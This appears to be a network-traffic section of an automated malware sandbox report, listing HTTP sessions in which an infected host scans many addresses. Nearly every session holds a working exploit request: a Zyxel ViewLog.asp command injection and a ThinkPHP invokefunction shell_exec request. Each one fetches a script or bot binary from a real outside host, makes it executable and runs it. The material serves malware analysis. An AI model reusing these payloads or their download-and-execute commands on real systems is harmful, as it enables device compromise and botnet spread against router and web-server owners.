                                                              X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA48elGU/M8hdCM+whIvk8wyNQyhPMRq/3x2KyygUZHA/Rv7JjM9n9Xf+C4JIH8SVhO43tQrWQq9q6Qp/19IHVadNFYVMizsWhA8Df7b5Uty/fVL7IK0ypen4NHZqkyG7YIgohnMnqe6UunQWYaSpXRFuWw0qQ/IIUKoDboumpL/Sfb2/FWDsDmTOQg7pPhpHZfqadkkpMst/I8EJrJ4mXVcUZywt5ZmGsnyGy9S///NkDGbVTI//fx4JmE28YZJMP4fXXg0lfGuOUZFyFAeiT3YksII5TdFUQhztJYWGkTZvSeH3Im9TM35mzztvFKyEOfXhShgtiYOhjjZBH83NSDQIDAQAB
                                                              Content-Length: 3174
                                                              Connection: close
                                                              Server: Jetty(9.4.z-SNAPSHOT)
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 ff c5 5b eb 72 db b8 15 fe dd 3c 05 96 4d 27 de 99 90 b4 2e be c6 56 9b 78 9d 49 b6 d9 d8 b5 9d a6 9d 4e 67 07 22 21 11 36 49 70 01 50 b6 fb 34 7d 96 3e 59 cf 01 40 8a 92 49 59 8e 92 6c 26 91 08 10 f8 ce fd 02 52 79 f6 0c fe 10 02 7f 8f 7e f8 e9 ec e4 ea 9f e7 a7 24 d1 59 3a 3a 72 9f 8c c6 44 32 f5 e9 e2 c3 b1 17 2a 4d 35 8f c2 bd 78 6f b8 c3 06 d4 23 31 d5 d4 97 42 e8 52 a6 c7 5e 35 66 ca 0c 1f 2c 1f 01 19 a0 65 3e 8f 34 d7 29 1b fd cc f2 1b 9e 2b f2 2f 77 f1 ef a3 d0 de 38 4a 79 7e 03 94 01 47 e9 fb 94 a9 84 31 ed 91 44 b2 c9 43 e4 30 52 2a 4c e9 bd 28 b5 1f 89 2c 13 79 00 33 1e d1 f7 05 3b f6 34 bb d3 a1 19 87 5f 00 6b 96 7d 3d b8 48 a4 42 7e 3d 38 d0 75 21 72 c5 67 cc 9f 4a 1e af 03 9c 08 a9 a3 52 13 1e 89 bc 13 7b 42 67 78 3f 80 8f 0a 8f 67 74 ca c2 59 1e 07 19 8f a4 50 62 a2 03 8b 51 e1 1b d9 8e bd 71 4a a3 1b cf 52 cb a8 ba f1 17 28
                                                              Data Ascii: [r<M'.VxINg"!6IpP4}>Y@IYl&Ry~$Y::rD2*M5xo#1BR^5f,e>4)+/w8Jy~G1DC0R*L(,y3;4_k}=HB~=8u!rgJR{Bgx?gtYPbQqJR(


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              220192.168.2.233290694.120.166.1428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.778147936 CET5336OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              221192.168.2.234085495.86.91.18080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.787724018 CET5337OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              222192.168.2.235678694.26.217.1108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.146087885 CET5380OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:43.562390089 CET5400INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:42 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              223192.168.2.235329295.164.34.858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.348975897 CET5392OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:43.650448084 CET5401INHTTP/1.0 400 Bad Request
                                                              Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                              Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              224192.168.2.234509431.136.3.1058080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.403465986 CET5394OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:44.399801016 CET5515OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:46.415556908 CET5762OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:50.446912050 CET6248OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:58.638086081 CET7210OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:14.763937950 CET9307OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:46.759500980 CET13216OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              225192.168.2.233333494.122.115.1178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.415086985 CET5394OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              226192.168.2.235038094.123.251.448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.418478966 CET5395OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              227192.168.2.233577462.29.125.2258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.462691069 CET5396OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              228192.168.2.235446895.85.44.24080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.495487928 CET5396OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:43.792315960 CET5487INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:43 GMT
                                                              Server: Apache
                                                              Referrer-Policy: no-referrer, strict-origin-when-cross-origin
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              229192.168.2.235353495.97.89.13880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.525077105 CET5397OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              23192.168.2.235901862.29.82.2418080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:10.891926050 CET1522OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              230192.168.2.235842095.68.106.16780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:43.525739908 CET5398OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:44.191693068 CET5513INHTTP/1.1 400 Bad Request
                                                              Connection: Keep-Alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              231192.168.2.235852095.82.50.1480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:44.128557920 CET5512OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:45.807683945 CET5735OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:47.791305065 CET5977OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:51.982825994 CET6475OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:59.917730093 CET7427OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:15.787718058 CET9429OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.807240963 CET13473OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              232192.168.2.2332884112.125.190.15380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:44.443222046 CET5516OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:44.757632017 CET5541INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:15:34 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              233192.168.2.2346326112.221.206.7780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:44.447931051 CET5517OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
